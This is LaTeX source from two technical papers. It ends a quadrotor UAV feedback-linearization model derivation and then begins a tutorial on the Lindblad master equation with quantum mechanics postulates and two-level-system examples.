+ 2\chi(t)R_b^i(\boldsymbol{\theta}(t))\begin{bmatrix}
\omega_y \\ -\omega_x \\ 0 \end{bmatrix}(t) + \\
+ \zeta(t)R_b^i(\boldsymbol{\theta}(t))\begin{bmatrix}
\omega_x\omega_z \\ \omega_y\omega_z \\ -(\omega_x^2 + \omega_y^2)
\end{bmatrix}(t) + \ddot{\mathbf{a}}_d(t).
\end{multline}
As a result, by introducing the quadrotor attitude dynamics from~\eqref{eq:extended_quad} in~\eqref{eq:r4_1}, we obtain:
\begin{equation}
\label{eq:fl_com}
\begin{split}
\mathbf{r}^{(4)}(t) &= R_b^i(\boldsymbol{\theta}(t))\begin{bmatrix}
\zeta u_3 \\ - \zeta u_2 \\ \ddot{u}_1
\end{bmatrix}(t) + \mathbf{h}_r(\mathbf{x}(t)) + \mathbf{d}_r(\mathbf{x}(t),t),
\end{split}
\end{equation}
where $\mathbf{h}_r$ and $\mathbf{d}_r$ are the known and the unknown disturbance terms, respectively. Specifically, $\mathbf{h}_r(\mathbf{x}(t))$ was defined as:
\begin{multline}
\label{eq:fl_com2}
\mathbf{h}_r(t) = \zeta(t)R_b^i(\boldsymbol{\theta}(t))\begin{bmatrix}
\omega_x\omega_z -h_{gy} \\ \omega_y\omega_z + h_{gx} \\ - (\omega_x^2 + \omega_y^2)
\end{bmatrix}(t) + \\
+ 2\chi(t)R_b^i(\boldsymbol{\theta}(t))\begin{bmatrix}
\omega_y \\ -\omega_x \\ 0 \end{bmatrix}(t),
\end{multline}
whereas $\mathbf{d}_r(\mathbf{x}(t))$ holds:
\begin{equation}
\label{eq:fl_com_d}
\begin{split}
\mathbf{d}_r(\mathbf{x}(t)) = R_b^i(\boldsymbol{\theta}(t))\begin{bmatrix}
\zeta d_{ry} \\ -\zeta d_{rx} \\ 0
\end{bmatrix}(t) + \ddot{\mathbf{a}}_d(t).
\end{split}
\end{equation}
From~\eqref{eq:fl_com_d}, it is interesting to notice how only tilt disturbances ($d_{rx}$, $d_{ry}$) act on the CoM dynamics, and how they are amplified by the body vertical acceleration $\zeta\,{=}\,u_1$, which is close to the gravity value for non aggressive manoeuvres~\cite{lotufo2016}.
\subsection{The Quadrotor UAV Case-study: Complete Model}
\label{subsec:quad_fla_head}
As a further step, putting together the heading dynamics~\eqref{eq:fl_heading} and the CoM dynamics~\eqref{eq:fl_com}, the whole input-output relation is found:
\begin{multline}
\label{eq:fl_final}
\begin{bmatrix} \mathbf{r}^{(4)} \\ \psi^{(2)} \end{bmatrix}(t) =
E(\boldsymbol{\theta}(t),\zeta(t))\overline{\mathbf{u}}(t) + \begin{bmatrix} \mathbf{h}_r \\ h_\psi \end{bmatrix}(t) +
\begin{bmatrix} \mathbf{d}_r \\ d_\psi \end{bmatrix}(t),
\end{multline}
where
\begin{equation}
\label{eq:fl_final2}
\begin{split}
E(\boldsymbol{\theta}(t),\zeta(t)) &= \left[ \begin{array}{c;{2pt/2pt}c}
B_r(\boldsymbol{\theta}(t),\zeta(t)) & \begin{array}{c}
0 \\ 0 \\ 0
\end{array} \\ \hdashline[2pt/2pt]
\begin{array}{ccc}
0 & -t_\theta c_\psi & \quad t_\theta s_\psi
\end{array} & 1
\end{array} \right] \\
B_r(\boldsymbol{\theta}(t),\zeta(t)) &= R_b^i(\boldsymbol{\theta}(t))\begin{bmatrix}
0 & 0 & \zeta(t) \\ 0 & -\zeta(t) & 0 \\ 1 & 0 & 0 \end{bmatrix}.
\end{split}
\end{equation}
As shown in~\eqref{eq:statetrans}, the state vector of the new equivalent model~\eqref{eq:fl_final} is defined by $\mathbf{z}\,{=}\,T(\mathbf{x})\,{=}\,[\mathbf{r} \:\: \mathbf{v} \:\: \mathbf{a} \:\: \mathbf{s} \:\: \psi \:\: \eta]^T$.
More interestingly, the total relative degree of the model in~\eqref{eq:fl_final} is equal to the order of the extended model in~\eqref{eq:extended_quad}, namely $r_1\,{+}\,r_2\,{+}\,r_3\,{+}\,r_4\,{=}\,n\,{=}\,14$: this implies that no internal dynamics exists, and a full input-output linearization has been achieved.
Furthermore, the decoupling matrix $E(\mathbf{x}(t))$ is non-singular in $D\,{=}\,\lbrace \mathbf{x}(t) \subset R^n : \zeta(t) \neq 0, |\phi(t)|<\pi/2, |\theta(t)|<\pi/2 \rbrace $. This implies that aggressive manoeuvres may be performed, although with tilt angles lower than $\pi/2$ (acrobatic manoeuvres, such as 360-loops, were not in the scope of~\cite{lotufoIEEE_TBC}). On the other side, since the actuators effect is lower-bounded by a minimum saturation thrust, the total vertical acceleration is always positive. For these practical reasons, the state trajectories was constrained to the domain $D$, where the invertibility of the decoupling matrix is guaranteed.
To conclude, \figurename~\ref{fig:model} sketches the final model~\eqref{eq:fl_final} (cf. also~\cite{lotufoIEEE_TBC}), where the non-linear couplings with the commands $u_2$ and $u_3$ in $\mathbf{b}_\psi$ were collected in $h_\psi^*(\mathbf{x}(t),u_2(t),u_3(t))\,{=}\,-t_\theta c_\psi u_2(t)\,{+}\,t_\theta s_\psi u_3(t)$. On the other hand, $\mathbf{h}_r$ and $h_\psi$ collect all the non-linearities, collocated at command level. Finally, consistently with the EMC design framework, the terms $\mathbf{d}_r$ and $d_\psi$ represent the non-explicitly modelled effects and the external disturbances.
\begin{figure}[!t]
\centering
\includegraphics[width=2.5in]{FBresult_v7}
\caption{Global scheme of the quadrotor UAV input-output linearized model, as result of the FL technique (Courtesy: \cite{lotufoIEEE_TBC}).}
\label{fig:model}
\end{figure}
As per \figurename~\ref{fig:model}, for the purpose of the linear control design, the model~\eqref{eq:fl_final} can be rewritten as:
\begin{subequations}
\label{eq:fl}
\begin{align}
\dot{\mathbf{r}}(t) &= \mathbf{v}(t), \quad \mathbf{r}(0) = \mathbf{r}_0, \label{eq:flA1} \\
\dot{\mathbf{v}}(t) &= \mathbf{a}(t), \quad \mathbf{v}(0) = \mathbf{v}_0, \label{eq:flA2} \\
\dot{\mathbf{a}}(t) &= \mathbf{s}(t), \quad \mathbf{a}(0) = \mathbf{a}_0, \label{eq:flA3} \\
\dot{\mathbf{s}}(t) &= \mathbf{u}_r(t) + \mathbf{h}_r(\mathbf{x}(t)) + \mathbf{d}_r(t), \quad \mathbf{s}(0) = \mathbf{s}_0, \label{eq:flA4} \\
\dot{\psi}(t) &= \eta(t), \quad \psi(0) = \psi_0, \label{eq:flB1} \\
\dot{\eta}(t) &= u_4(t) + h_\psi(\mathbf{x}(t)) + h_\psi^*(\cdot) + d_\psi(t), \quad \eta(0) = \eta_0, \label{eq:flB2}
\end{align}
\end{subequations}
where $\mathbf{u}_r$ is a transformed command, defined as:
\begin{equation}
\label{eq:new_ur}
\begin{split}
\mathbf{u}_r(t) &= \mathbf{B}_r(\mathbf{x}(t)) \begin{bmatrix} \ddot{u}_1 & u_2 & u_3 \end{bmatrix}^T(t).
\end{split}
\end{equation}
As a result,~\cref{eq:flA1,eq:flA2,eq:flA3,eq:flA4,eq:flB1,eq:flB2} represent the UAV quadrotor model where all the non-linearities have been collocated at the command level and therefore can be cancelled by a non-linear feedback in the form expressed in~\eqref{eq:law_fl}. Nevertheless, this approach relies on the perfect knowledge of the model non-linearities ($\mathbf{h}_r$ , $h_{psi}$) which may considerably limit the controller performance as well as its practical applicability.
To this aim, the novel approach proposed in~\cite{lotufoIEEE_TBC} (namely, the FL-EMC design) considers the model~\eqref{eq:fl} from a different point of view. More precisely, the non-linear components are treated as generic unknown disturbances which are real-time estimated by a proper extended state observer. Thus, implementing a direct disturbance rejection, jointly with a linear control law, it is possible to completely neglect model non-linearities and, at same time, to enhance the controller robustness against model uncertainties.
\ifCLASSOPTIONcaptionsoff
\newpage
\fi
\bibliographystyle{IEEEtran}
| 2024-02-18T23:40:08.702Z | 2019-06-12T02:03:13.000Z | algebraic_stack_train_0000 | 1,456 | 3,087 |
|
proofpile-arXiv_065-7128 | \section{Introduction}
Open quantum system techniques are vital for many studies in quantum mechanics \cite{gardiner_00,breuer_02,rivas_12}. This happens because closed quantum systems are just an idealisation of real systems\footnote{The same happens with closed classical systems.}, as in Nature nothing can be isolated. In practical problems, the interaction of the system of interest with the environment cannot be avoided, and we require an approach in which the environment can be effectively removed from the equations of motion.
The general problem addressed by Open Quantum Theory is sketched in Figure \ref{fig:fig0}. In the most general picture, we have a total system that conforms a closed quantum system by itself. We are mostly interested in a subsystem of the total one (we call it just ``system'' instead ``total system''). Therefore, the whole system is divided into our system of interest and an environment. The goal of Open Quantum Theory is to infer the equations of motions of the reduced systems from the equation of motion of the total system. For practical purposes, the reduced equations of motion should be easier to solve than the full dynamics of the system. Because of his requirement, several approximations are usually made in the derivation of the reduced dynamics.
\begin{figure}[h!]
\begin{center}
\includegraphics[scale=0.2]{figure0}
\end{center}
\caption{A total system divided into the system of interest, ``System'', and the environment. }
\label{fig:fig0}
\end{figure}
One particular, and interesting, case of study is the dynamics of a system connected to several baths modelled by a Markovian interaction. In this case the most general quantum dynamics is generated by the Lindblad equation (also called Gorini-Kossakowski-Sudarshan-Lindblad equation) \cite{lindblad:cmp76,gorini:jmp76}. It is difficult to overemphasize the importance of this Master Equation. It plays an important role in fields as quantum optics \cite{gardiner_00,manzano:sr16}, condensed matter \cite{prosen:prl11,manzano:pre12,manzano:njp16,olmos:prl12}, atomic physics \cite{metz:prl06,jones:pra18}, quantum information \cite{lidar:prl98,kraus:08}, decoherence \cite{brun:pra00,schlosshauer_07}, and quantum biology \cite{plenio:njp08,mohseni:jcp08, manzano:po13}.
The purpose of this paper is to provide basic knowledge about the Lindblad Master Equation. In Section \ref{sec:math}, the mathematical requirements are introduced while in Section \ref{sec:qm} there is a brief review of quantum mechanical concepts that are required to understand the paper. Section \ref{sec:fl}, includes a description of a mathematical framework, the Fock-Liouville space, that is especially useful to work in this problem. In Section \ref{cpt}, we define the concept of CPT-Maps, derive the Lindblad Master Equation from two different approaches, and we discus several properties of the equation. Finally, Section \ref{sec:resolution} is devoted to the resolution of the master equation using different methods. To deepen in the techniques of solving the Lindblad equation, an example consisting of a two-level system with decay is analysed, illustrating the content of every section. The problems proposed are solved by the use of Mathematica notebooks that can be found at \cite{notebook}.
\section{Mathematical basis}
\label{sec:math}
The primary mathematical tool in quantum mechanics is the theory of Hilbert spaces. This mathematical framework allows extending many results from finite linear vector spaces to infinite ones. In any case, this tutorial deals only with finite systems and, therefore, the expressions `Hilbert space' and `linear space' are equivalent. We assume that the reader is skilled in operating in Hilbert spaces. To deepen in the field of Hilbert spaces we recommend the book by Debnath and Mikusi\'nki \cite{debnath_05}. If the reader needs a brief review of the main concepts required for understanding this paper, we may recommend Nielsen and Chuang's Quantum Computing book \cite{nielsen_00}. It is also required some basic knowledge about infinitesimal calculus, like integration, derivation, and the resolution of simple differential equations, To help the readers, we have made a glossary of the most used mathematical terms. It can be used also as a checklist of terms the reader should be familiar with.
\vspace{0.25cm}
\noindent
{\bf Glossary:}
\begin{itemize}
\item ${\cal H}$ represents a Hilbert space, usually the space of pure states of a system.
\item $\ket{\psi}\in {\cal H}$ represents a vector of the Hilbert space ${\cal H}$ (a column vector).
\item $\bra{\psi}\in {\cal H}$ represents a vector of the dual Hilbert space of ${\cal H}$ (a row vector).
\item $\bracket{\psi}{\phi}\in \mathbb{C}$ is the scalar product of vectors $\ket{\psi}$ and $\ket{\phi}$.
\item $\norm{\ket{\psi}}$ is the norm of vector $\ket{\psi}$. $\norm{\ket{\psi}}\equiv\sqrt{\bracket{\psi}{\psi}}$.
\item $B({\cal H})$ represents the space of bounded operators acting on the Hilbert space $B:{\cal H} \to {\cal H}$.
\item $\mathbb 1_{{\cal H}}\in B({\cal H})$ is the Identity Operator of the Hilbert space ${\cal H}$ s.t. $\mathbb 1_{{\cal H}}\ket{\psi}=\ket{\psi},\; \; \forall \ket{\psi}\in {\cal H} $.
\item $\op{\psi}{\phi}\in B({\cal H})$ is the operator such that $\pare{\op{\psi}{\phi}} \ket{\varphi}=\bracket{\phi}{\varphi} \ket{\psi},\; \; \forall \ket{\varphi} \in {\cal H}$.
\item $O^\dagger\in B({\cal H})$ is the Hermitian conjugate of the operator $O\in B({\cal H})$.
\item $U\in B({\cal H})$ is a unitary operator iff $U U^{\dagger}=U^{\dagger}U=\mathbb 1$.
\item $H\in B({\cal H})$ is a Hermitian operator iff $H=H^{\dagger}$.
\item $A\in B({\cal H})$ is a positive operator $\pare{A> 0}$ iff $\bra{\phi} A \ket{\phi}\ge0,\;\; \forall \ket{\phi}\in {\cal H}$
\item $P\in B({\cal H})$ is a proyector iff $P P=P$.
\item $\textrm{Tr}\cor{B}$ represents the trace of operator $B$.
\item $\rho\pare{{\cal L}}$ represents the space of density matrices, meaning the space of bounded operators acting on ${\cal H}$ with trace $1$ and positive.
\item $\kket{\rho}$ is a vector in the Fock-Liouville space.
\item $\bbracket{A}{B}=\textrm{Tr}\cor{A^\dagger B}$ is the scalar product of operators $A,B\in B({\cal H})$ in the Fock-Liouville space.
\item $\tilde{{\cal L}}$ is the matrix representation of a superoperator in the Fock-Liouville space.
\end{itemize}
\section{(Very short) Introduction to quantum mechanics}
\label{sec:qm}
The purpose of this chapter is to refresh the main concepts of quantum mechanics necessary to understand the Lindblad Master Equation. Of course, this is NOT a full quantum mechanics course. If a reader has no background in this field, just reading this chapter would be insufficient to understand the remaining of this tutorial. Therefore, if the reader is unsure of his/her capacities, we recommend to go first through a quantum mechanics course or to read an introductory book carefully. There are many great quantum mechanics books in the market. For beginners, we recommend Sakurai's book \cite{sakurai_94} or Nielsen and Chuang's Quantum Computing book \cite{nielsen_00}. For more advanced students, looking for a solid mathematical description of quantum mechanics methods, we recommend Galindo and Pascual \cite{galindo_pascual_90}. Finally, for a more philosophical discussion, you should go to Peres' book \cite{peres_95}.
We start stating the quantum mechanics postulates that we need to understand the derivation and application of the Lindblad Master Equation. The first postulate is related to the concept of a quantum state.
\vspace{0.5cm}
\begin{postulate}
Associated to any isolated physical system, there is a complex Hilbert space ${\cal H}$, known as the {\bf state space} of the system. The state of the system is entirely described by a {\it state vector}, which is a unit vector of the Hilbert space $(\ket{\psi}\in {\cal H})$.
\end{postulate}
\vspace{0.5cm}
\noindent
As quantum mechanics is a general theory (or a set of theories), it does not tell us which is the proper Hilbert space for each system. This is usually done system by system. A natural question to ask is if there is a one-to-one correspondence between unit vectors and physical states, meaning that if every unit vector corresponds to a physical system. This is resolved by the following corollary that is a primary ingredient for quantum computation theory (see Ref. \cite{nielsen_00} Chapter 7).
\vspace{0.5cm}
\begin{corollary}
All unit vectors of a finite Hilbert space correspond to possible physical states of a system.
\end{corollary}
\vspace{0.5cm}
\noindent
Unit vectors are also called {\it pure states}. If we know the pure state of a system, we have all physical information about it, and we can calculate the probabilistic outcomes of any potential measurement (see the next postulate). This is a very improbable situation as experimental settings are not perfect, and in most cases, we have only imperfect information about the state. Most generally, we may know that a quantum system can be in one state of a set $\key{\ket{\psi_i}}$ with probabilities $p_i$. Therefore, our knowledge of the system is given by an {\it ensemble of pure states} described by the set $\key{\ket{\psi_i}, \; p_i}$. If more than one $p_i$ is different from zero the state is not pure anymore, and it is called a {\it mixed state}. The mathematical tool that describes our knowledge of the system, in this case, is the {\it density operator} (or {\it density matrix}).
\begin{equation}
\rho \equiv \sum_i p_i \op{\psi_i}{\psi_i}.
\label{eq:dm}
\end{equation}
Density matrices are bounded operators that fulfil two mathematical conditions
\begin{enumerate}
\item A density matrix $\rho$ has unit trace $\pare{\textrm{Tr}[\rho]=1 }$.
\item A density matrix is a positive matrix $\rho>0$.
\end{enumerate}
Any operator fulfilling these two properties is considered a density operator. It can be proved trivially that density matrices are also Hermitian.
If we are given a density matrix, it is easy to verify if it belongs to a pure or a mixed state. For pure states, and only for them, $\textrm{Tr}[\rho^2]=\textrm{Tr}[\rho]=1$. Therefore, if $\textrm{Tr}[\rho^2]<1$ the system is mixed. The quantity $\textrm{Tr}[\rho^2]$ is called the purity of the states, and it fulfils the bounds $\frac{1}{d} \le \textrm{Tr}[\rho^2] \le 1$, being $d$ the dimension of the Hilbert space.
If we fix an arbitrary basis $\key{\ket{i}}_{i=1}^N$ of the Hilbert space the density matrix in this basis is written as $\rho=\sum_{i,j=1}^N \rho_{i,j} \op{i}{j}$, or
\begin{equation}
\rho=
\begin{pmatrix}
\rho_{00} & \rho_{01} & \cdots & \rho_{0N} \\
\rho_{10} & \rho_{11} & \cdots & \rho_{1N} \\
\vdots & \vdots & \ddots & \vdots \\
\rho_{N0} & \rho_{N1} & \cdots & \rho_{NN}
\end{pmatrix},
\end{equation}
where the diagonal elements are called {\it populations} $\pare{\rho_{ii}\in\mathbb{R}_0^+\text{ and } \sum_{i} \rho_{i,i}=1}$, while the off-diagonal elements are called {\it coherences} $\pare{ \rho^{\phantom{*}}_{i,j} \in \mathbb{C} \text{ and } \rho^{\phantom{*}}_{i,j}=\rho_{j,i}^*}$. Note that this notation is base-dependent.
\begin{center}
\vspace{0.5cm}
\framebox[15.5cm][l]{
\begin{minipage}[l]{15cm}
\vspace{0.25cm}
{\bf Box 1. State of a two-level system (qubit)}
\vspace{0.25cm}
The Hilbert space of a two-level system is just the two-dimension lineal space ${\cal H}_2$. Examples of this kind of system are $\frac{1}{2}$-spins and two-level atoms. We can define a basis of it by the orthonormal vectors: $\key{ \ket{0},\;\ket{1}}$. A pure state of the system would be any unit vector of ${\cal H}_2$. It can always be expressed as a $\ket{\psi}=a\ket{0} + b\ket {1}$ with $a,b \in \mathbb{C}$ s. t. $\abs{a}^2 + \abs{b}^2=1$.
\vspace{0.25cm}
A mixed state is therefore represented by a positive unit trace operator $ \rho\in O({\cal H}_2)$.
\begin{equation}
\rho =
\begin{pmatrix}
\rho_{00} & \rho_{01} \\
\rho_{10} & \rho_{11}
\end{pmatrix}
= \rho_{00} \proj{0} + \rho_{01} \op{0}{1} + \rho_{10} \op{1}{0} + \rho_{11} \proj{1},
\label{eq:denmat}
\end{equation}
ant it should fulfil $\rho_{00}+\rho_{11}=1$ and $\rho_{01}^{\phantom{*}}=\rho_{10}^*$.
\vspace{0.25cm}
\end{minipage}
\label{minipage1}
}
\end{center}
\vspace{0.5cm}
\noindent
Once we know the state of a system, it is natural to ask about the possible outcomes of experiments (see Ref. \cite{sakurai_94}, Section 1.4).
\vspace{0.5cm}
\begin{postulate}
All possible measurements in a quantum system are described by a Hermitian operator or {\bf observable}. Due to the Spectral Theorem we know that any observable $O$ has a spectral decomposition in the form\footnote{For simplicity, we assume a non-degenerated spectrum.}
\begin{equation}
O=\sum_i a_i \op{a_i}{a_i},
\end{equation}
being $a_i\in\mathbb{R}$ the eigenvalues of the observable and $\ket{a_i}$ their corresponding eigenvectors. The probability of obtaining the result $a_i$ when measuring the property described by observable $O$ in a state $\ket{\psi}$ is given by
\begin{equation}
P(a_i)= \left| \bracket{\psi}{a_i} \right|^2.
\end{equation}
After the measurement we obtain the state $\ket{a_i}$ if the outcome $a_i$ was measured. This is called the {\it post-measurement state}.
\label{post4}
\end{postulate}
\vspace{0.5cm}
This postulate allow us to calculate the possible outputs of a system, the probability of these outcomes, as well as the after-measurement state. A measurement usually changes the state, as it can only remain unchanged if it was already in an eigenstate of the observable.
It is possible to calculate the expectation value of the outcome of a measurement defined by operator $O$ in a state $\ket{\psi}$ by just applying the simple formula
\begin{equation}
\mean{O}= \bra{\psi} O \ket{\psi}.
\end{equation}
With a little algebra we can translate this postulate to mixed states. In this case, the probability of obtaining an output $a_i$ that corresponds to an eigenvector $\ket{a_i}$ is
\begin{equation}
P(a_i)=\textrm{Tr}\cor{\proj{a_i}\rho},
\end{equation}
and the expectation value of operator $O$ is
\begin{equation}
\mean{O}=\textrm{Tr} \cor{O\rho}.
\end{equation}
\begin{center}
\vspace{0.5cm}
\framebox[15.5cm][l]{
\begin{minipage}[l]{15cm}
\vspace{0.25cm}
{\bf Box 2. Measurement in a two-level system.}
\vspace{0.25cm}
A possible test to perform in our minimal model is to measure the energetic state of a system, assuming that both states have a different energy. The observable corresponding to this measurement would be
\begin{equation}
H=E_0 \proj{0} + E_1 \proj{1}.
\end{equation}
This operator has two eigenvalues $\key{E_0,\;E_1}$ with two corresponding eigenvectors $\key{\ket{0},\; \ket{1}}$.
\vspace{0.25cm}
If we have a pure state $\psi=a\ket{0} + b \ket{1}$ the probability of measuring the energy $E_0$ would be $P(E_0)=\abs{\bracket{0}{\psi}}^2=\abs{a}^2$. The probability of finding $E_1$ would be $P(E_1)=\abs{\bracket{1}{\psi}}^2=\abs{b}^2$. The expected value of the measurement is $\mean{H}= E_0\abs{a}^2+ E_1\abs{b}^2$.
\vspace{0.25cm}
In the more general case of having a mixed state $\rho=\rho_{00} \proj{0} + \rho_{01} \op{ 0}{1} + \rho_{10} \op{1}{0} + \rho_{11} \proj{1}$ the probability of finding the ground state energy is $P(0)=\textrm{Tr} \cor{ \proj{0} \rho }= \rho_{00}$, and the expected value of the energy would be $\mean{H}=\textrm{Tr} \cor{H\rho}= E_0 \rho_{00} + E_1 \rho_{11}$.
\vspace{0.25cm}
\end{minipage}
\label{minipage2}
}
\end{center}
\vspace{0.5cm}
\noindent
Another natural question to ask is how quantum systems evolve. The time-evolution of a pure state of a closed quantum system is given by the Schr\"odinger equation (see \cite{galindo_pascual_90}, Section 2.9).
\vspace{0.5cm}
\begin{postulate}
Time evolution of a pure state of a closed quantum system is given by the Schr\"odinger equation
\begin{equation}
\frac{d}{dt} \ket{\psi(t)} = -i\hbar H\ket{\psi(t)},
\label{eq:sch}
\end{equation}
where $H$ is the {\it Hamiltonian} of the system and it is a Hermitian operator of the Hilbert space of the system state (from now on we avoid including Planck's constant by selecting the units such that $\hbar=1)$.
\label{post3}
\end{postulate}
\vspace{0.5cm}
\noindent
The Hamiltonian of a system is the operator corresponding to its energy, and it can be non-trivial to realise.
Schr\"odinger equation can be formally solved in the following way. If at $t=0$ the state of a system is given by $\ket{\psi(0)}$ at time $t$ it will be
\begin{equation}
\ket{\psi(t)}=e^{-i Ht } \ket{\psi(0)}.
\end{equation}
As $H$ is a Hermitian operator, the operator $U=e^{-i Ht }$ is unitary. This gives us another way of phrasing Postulate \ref{post3}.
\vspace{0.5cm}
{\bf Postulate 3'}
{\it The evolution of a closed system is given by a unitary operator of the Hilbert space of the system }
\begin{equation}
\ket{\psi(t)}=U \ket{\psi(0)},
\label{eq:evol}
\end{equation}
{\it with} $U\in {\cal B}\pare{{\cal H}}$ {\it s.t.} $U U^{\dagger}=U^{\dagger}U=\mathbb 1$.
\vspace{0.5cm}
\noindent
It is easy to prove that unitary operators preserve the norm of vectors and, therefore, transform pure states into pure states. As we did with the state of a system, it is reasonable to wonder if any unitary operator corresponds to the evolution of a real physical system. The answer is yes.
\vspace{0.5cm}
\begin{lemma}
All unitary evolutions of a state belonging to a finite Hilbert space can be constructed in several physical realisations like photons and cold atoms.
\end{lemma}
\noindent
The proof of this lemma can be found at \cite{nielsen_00}.
The time evolution of a mixed state can be calculated just by combining Eqs. (\ref{eq:sch}) and (\ref{eq:dm}), giving the von-Neumann equation.
\begin{equation}
\dot{\rho} = - i \cor{H,\rho}\equiv {\cal L} \rho,
\label{eq:vne}
\end{equation}
where we have used the commutator $\cor{A,B}=AB-BA$, and ${\cal L}$ is the so-called Liouvillian superoperator.
It is easy to prove that the Hamiltonian dynamics does not change the purity of a system
\begin{equation}
\frac{d}{dt} \textrm{Tr}\cor{\rho^2} = \textrm{Tr}\cor{ \frac{d \rho^2}{dt} } = \textrm{Tr}\cor{ 2\rho \dot{\rho} } = -2 i \textrm{Tr}\cor{ \rho\pare{ H\rho -\rho H } }=0,
\end{equation}
where we have used the cyclic property of the trace. This result illustrates that the mixing rate of a state does not change due to the quantum evolution.
\begin{center}
\framebox[15.5cm][l]{
\begin{minipage}[l]{15cm}
\vspace{0.25cm}
{\bf Box 3. Time evolution of a two-level system.}
\vspace{0.25cm}
The evolution of our isolated two-level system is described by its Hamiltonian
\begin{equation}
H_{\text{free}}=E_0 \proj{0} + E_1 \proj{1},
\label{eq:atomham}
\end{equation}
As the states $\ket{0}$ and $\ket{1}$ are Hamiltonian eigenstates if at $t=0$ the atom is at the excited state $\ket{\psi(0)}=\ket{1}$ after a time $t$ the state would be $\ket{\psi(t)}=e^{-iHt} \ket{1}=e^{-i E_1 t} \ket{1}$.
\vspace{0.1cm}
As the system was already in an eigenvector of the Hamiltonian, its time-evolution consists only in adding a phase to the state, without changing its physical properties. (If an excited state does not change, why do atoms decay?) Without losing any generality we can fix the energy of the ground state as zero, obtaining
\begin{equation}
H_{\text{free}}= E \proj{1},
\label{eq:atomham2}
\end{equation}
with $E\equiv E_1$. To make the model more interesting we can include a driving that coherently switches between both states. The total Hamiltonian would be then
\begin{equation}
H=E \proj{1} + \Omega \pare{\op{0}{1} +\op{1}{0}},
\end{equation}
where $\Omega$ is the frequency of driving. By using the von-Neumann equation (\ref{eq:vne}) we can calculate the populations $\pare{\rho_{00},\rho_{11}}$ as a function of time. The system is then driven between the states, and the populations present Rabi oscillations, as it is shown in Fig. \ref{figure1}.
\begin{center}
\includegraphics[scale=.8]{figure1}
\captionof{figure}{Population dynamics under a quantum dynamics (Parameters are $\Omega=1,\; E=1$). The blue line represents $\rho_{11}$ and the orange one $\rho_{00}$.}
\label{figure1}
\end{center}
\end{minipage}
}\end{center}
\vspace{0.5cm}
\noindent
Finally, as we are interested in composite quantum systems, we need to postulate how to work with them.
\vspace{0.5cm}
\begin{postulate}
The state-space of a composite physical system, composed by $N$ subsystems, is the tensor product of the state space of each component
${\cal H}={\cal H}_1 \otimes {\cal H}_2 \otimes \cdots \otimes {\cal H}_N$. The state of the composite physical system is given by a unit vector of ${\cal H}$. Moreover, if each subsystem belonging to ${\cal H}_i$ is prepared in the state $\ket{\psi_i}$ the total state is given by $\ket{\psi}=\ket{\psi_1} \otimes \ket{\psi_2} \otimes \cdots \otimes\ket{\psi_N}$.
\end{postulate}
\vspace{0.5cm}
\noindent
The symbol $\otimes$ represents the tensor product of Hilbert spaces, vectors, and operators. If we have a composited mixed state where each component is prepared in the state $\rho_i$ the total state is given by $\rho=\rho_1 \otimes \rho_2 \otimes \cdots \otimes\rho_N$.
States that can be expressed in the simple form $\ket{\psi}=\ket{\psi_1} \otimes \ket{\psi_2}$, in any specific basis, are very particular and they are called {\it separable states} (For this discussion, we use a bipartite system as an example. The extension to a general multipartite system is straightforward.) . In general, any arbitrary state should be described as $\ket{\psi}=\sum_{i,j} \ket{\psi_i} \otimes \ket{\psi_j}$ (or $\rho=\sum_{i,j} \rho_i \otimes \rho_j$ for mixed states). Non-separable states are called {\it entangled states}.
Now that we know how to compose systems, but we can be interested in going the other way around. If we have a system belonging to a bipartite Hilbert space in the form ${\cal H}={\cal H}_a \otimes {\cal H}_b$ we can be interested in studying some properties of the subsystem corresponding to one of the subspaces. To do so, we define the {\it reduced density matrix}. If the state of our system is described by a density matrix $\rho$ the reduced density operator of the subsystem $a$ is defined by the operator
\begin{equation}
\rho_{a} \equiv \textrm{Tr}_{b} \cor{\rho},
\end{equation}
were $\textrm{Tr}_b$ is the partial trace over subspace $b$ and it is defined as \cite{nielsen_00}
\begin{equation}
\textrm{Tr}_b \cor{ \sum_{i,j,k,l} \op{a_i}{a_j} \otimes \op{b_k}{b_l} } \equiv\sum_{i,j} \op{a_i}{a_j} \textrm{Tr} \cor{ \sum_{k,l} \op{b_k}{b_l}}.
\end{equation}
The concepts of reduced density matrix and partial trace are essential in the study of open quantum systems. If we want to calculate the equation of motions of a system affected by an environment, we should trace out this environment and deal only with the reduced density matrix of the system. This is the main idea of the theory of open quantum systems.
\newpage
\begin{center}
\framebox[15.5cm][l]{
\begin{minipage}[l]{15cm}
\vspace{0.25cm}
{\bf Box 4. Two two-level atoms}
\vspace{0.25cm}
If we have two two-level systems, the total Hilbert space is given by ${\cal H}={\cal H}_2\otimes {\cal H}_2$. A basis of this Hilbert space would be given by the set $\left\{ \ket{00}\equiv \ket{0}_1 \otimes\ket{0}_2,\; \ket{01}\equiv \ket{0}_1 \otimes\ket{1}_2,\; \ket{10}\equiv \ket{1}_1 \otimes\ket{0}_2,\;\ket{11}\equiv \ket{1}_1 \otimes\ket{1}_2 \right\}$. If both systems are in their ground state, we can describe the total state by the separable vector
\begin{equation}
\ket{\psi}_G=\ket{00}.
\end{equation}
A more complex, but still separable, state can be formed if both systems are in superposition.
\begin{eqnarray}
\ket{\psi}_S&=&\frac{1}{\sqrt{2}} \left( \ket{0}_1 +\ket{1}_1 \right) \otimes \frac{1}{ \sqrt{2}} \left( \ket{0}_2 +\ket{1}_2 \right) \nonumber\\
&=& \frac{1}{2} \left( \ket{00} + \ket{10} + \ket{01} + \ket{11} \right)
\end{eqnarray}
An entangled state would be
\begin{equation}
\ket{\psi}_E=\frac{1}{ \sqrt{2}} \left( \ket{00} +\ket{11} \right).
\end{equation}
This state cannot be separated into a direct product of each subsystem. If we want to obtain a reduced description of subsystem $1$ (or $2$) we have to use the partial trace. To do so, we need first to calculate the density matrix corresponding to the pure state $\ket{\psi}_E$.
\begin{equation}
\rho_E=\ket{\psi}\bra{\psi}_E = \frac{1}{2} \left( \proj{00} + \op{00}{11} + \op{11}{00} + \proj{11} \right).
\end{equation}
We can now calculate the reduced density matrix of the subsystem $1$ by using the partial trace.
\begin{equation}
\rho_E^{(1)}= \bra{0}_2 \rho_E \ket{0}_2 + \bra{1}_2 \rho_E \ket{1}_2 = \frac{1}{2} \left( \proj{00}_1 + \proj{11}_2 \right).
\end{equation}
From this reduced density matrix, we can calculate all the measurement statistics of subsystem $1$.
\vspace{0.25cm}
\end{minipage}
}
\end{center}
\vspace{0.5cm}
\newpage
\section{The Fock-Liouville Hilbert space. The Liouville superoperator}
\label{sec:fl}
